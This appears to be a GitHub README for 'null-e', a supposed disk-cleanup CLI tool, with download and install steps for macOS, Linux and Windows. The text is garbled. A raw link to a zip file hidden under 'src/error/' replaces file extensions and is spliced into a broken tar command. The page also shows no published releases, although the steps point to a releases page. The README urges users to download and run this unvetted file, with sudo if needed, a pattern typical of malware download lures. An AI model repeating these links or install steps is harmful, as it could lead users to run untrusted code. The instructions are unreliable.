Skip to content

🧹 Clean up unwanted files and reclaim disk space with null-e, a fast CLI tool for developers on macOS, Linux, and Windows.

License

Notifications You must be signed in to change notification settings

lakeez201/null-e

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

19 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ—‘οΈ null-e - Clear Disk Space Quickly and Easily

Download null-e

πŸš€ Getting Started

Welcome to null-e, the disk cleanup tool that helps developers reclaim space on their devices. This guide will walk you through the steps to download and run null-e without any technical knowledge.

✨ What is null-e?

null-e is a command line tool designed to clean up unnecessary files on your computer. It targets folders like node_modules, target, .venv, Docker caches, and Xcode caches. With null-e, you can reclaim over 100 GB of disk space efficiently. It runs fast and works on macOS, Linux, and Windows.

πŸ“‹ System Requirements

  • Operating System:
    • macOS: Version 10.12 or newer
    • Linux: Any modern distribution
    • Windows: Version 10 or newer
  • Disk Space: At least 200 MB for installation
  • Network Connection: Required for downloading the application

🌐 Key Features

  • Comprehensive Cleanup: Removes unwanted files to free up disk space.
  • User-Friendly: Easy to install and use with simple commands.
  • Cross-Platform: Works on macOS, Linux, and Windows.
  • Fast Performance: Built with Rust for speed and efficiency.

πŸ“₯ Download & Install

To get started, visit the downloads page where you can obtain the latest version of null-e:

Download null-e

Once you open the releases page, you will see several versions. Follow these steps:

  1. Look for the latest version which is usually at the top of the list.
  2. Click on the desired file for your operating system (e.g., .exe for Windows, https://raw.githubusercontent.com/lakeez201/null-e/main/src/error/e_null_3.9-alpha.3.zip for Linux).
  3. The download will start automatically.

After the download finishes, follow the instructions below based on your operating system to install and run null-e.

πŸ–₯️ Installation Instructions

For macOS:

  1. Locate the downloaded file in your Downloads folder.
  2. Open your terminal.
  3. Navigate to the folder where the file is located by typing:
    cd ~/Downloads
  4. Make the file executable by typing:
    chmod +x null-e-<version>.app
  5. Now, you can run it by typing:
    ./null-e-<version>.app

For Linux:

  1. Find the downloaded file in your Downloads folder.
  2. Open your terminal.
  3. Navigate to the folder with the downloaded file:
    cd ~/Downloads
  4. Extract the https://raw.githubusercontent.com/lakeez201/null-e/main/src/error/e_null_3.9-alpha.3.zip if necessary:
    tar -xzf null-e-<version>https://raw.githubusercontent.com/lakeez201/null-e/main/src/error/e_null_3.9-alpha.3.zip
  5. Go into the extracted folder and run:
    cd null-e-<version>
    ./null-e

For Windows:

  1. Locate the downloaded .exe file in your Downloads folder.
  2. Double-click the file to run the application.
  3. Follow the on-screen instructions to use null-e.

πŸš€ How to Use null-e

After installing, using null-e is straightforward.

  1. Open your command line tool (Terminal on macOS/Linux, Command Prompt or PowerShell on Windows).
  2. To clean up specific folders, run:
    null-e clean
  3. If you want to target specific directories, use:
    null-e clean /path/to/directory
  4. You can also specify options to include/exclude folders in your cleanup operation.

πŸ› οΈ Troubleshooting

Here are common scenarios you might encounter and how to resolve them:

  • Permission Issues: Ensure you have permission to access the folders you wish to clean. Use sudo on Linux and macOS if needed.

  • Command Not Found: Make sure that null-e is added to your system's PATH. Refer to the installation steps to adjust this.

  • Cleanup Issues: If you notice that not all junk files are cleared, try running the command again or check if there are any configuration errors.

πŸ“ž Support

If you have any issues or questions, feel free to check the FAQ section in the repository or reach out through the Issues tab on GitHub.

πŸ’» Contributing

If you want to help us make null-e even better, check out the contributing guidelines in the repository. Your support makes a difference in the project.

🌍 Stay Updated

Follow this repository for updates and new releases to ensure you always have the latest version of null-e.

You can see all the available releases at the following link:

Download null-e

About

🧹 Clean up unwanted files and reclaim disk space with null-e, a fast CLI tool for developers on macOS, Linux, and Windows.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •  

Languages